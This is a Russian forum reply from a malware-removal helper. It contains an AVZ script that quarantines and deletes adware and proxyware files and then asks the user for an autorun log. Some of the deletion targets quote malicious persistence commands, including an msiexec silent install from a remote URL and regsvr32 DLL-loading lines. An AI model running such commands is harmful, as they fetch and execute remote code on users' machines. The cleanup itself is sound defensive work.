ВЫполните скрипт в AVZ
Код:
begin
SetAVZPMStatus(True);
QuarantineFile('c:\programdata\mysampleservice\sys.exe','');
QuarantineFile('c:\programdata\tiser\run.exe','');
QuarantineFile('c:\programdata\prefssecure\nettrans.exe','');
QuarantineFile('C:\Users\user\AppData\Local\lumsystem\Luminati\net_svc.exe','');
QuarantineFile('c:\users\user\appdata\local\mail.ru\mailruupdater.exe','');
QuarantineFile('C:\Users\user\AppData\Local\lumsystem\lumsystem.exe','');
DeleteFile('c:\programdata\appmallosayov\appmallosayov.exe','32');
BC_DeleteFile('C:\Users\user\AppData\Local\lumsystem\lumsystem.exe');
DeleteFile('c:\users\user\appdata\local\mail.ru\mailruupdater.exe','32');
DeleteFile('C:\Users\user\AppData\Local\lumsystem\Luminati\net_svc.exe','32');
DeleteFile('c:\programdata\prefssecure\nettrans.exe','32');
DeleteFile('c:\programdata\tiser\run.exe','32');
DeleteFile('c:\programdata\mysampleservice\sys.exe','32');
DeleteFile('C:\ProgramData\MySampleService\sys.exe','32');
DeleteFile('C:\ProgramData\AppmallosayoV\AppmallosayoV.exe','32');
DeleteFile('C:\ProgramData\tiser\run.exe','32');
DeleteFile('C:\ProgramData\PrefsSecure\Nettrans.exe','32');
DeleteFile('explorer.exe,msiexec.exe /i http://point.ltdmsjq.com/?data=zDlkMj1WFjw2MdRYFjY3FjF4RUQQMTY4RYRYNTM1F8FyRWM4Rq== /q','32');
DeleteFile('C:\Windows\System32\rundll32.exe url,FileProtocolHandler http://www.mail.ru/cnt/20775012?gp=','32');
DeleteFile('C:\Windows\SysWOW64\regsvr32.exe /n /s /i:/52d7db659c384df7 /q C:\Users\user\AppData\Local\0FB3B0~1\{99338~1.','32');
DeleteFile('C:\Windows\system32\regsvr32.exe /s /n /i:/rt C:\PROGRA~3\af8235af\993380d4.dll','32');
BC_ImportDeletedList;
BC_ImportAll;
ExecuteSysClean;
ExecuteWizard('TSW',2,3,true);
BC_Activate;
end.
После перезагрузки выложите
образ автозапуска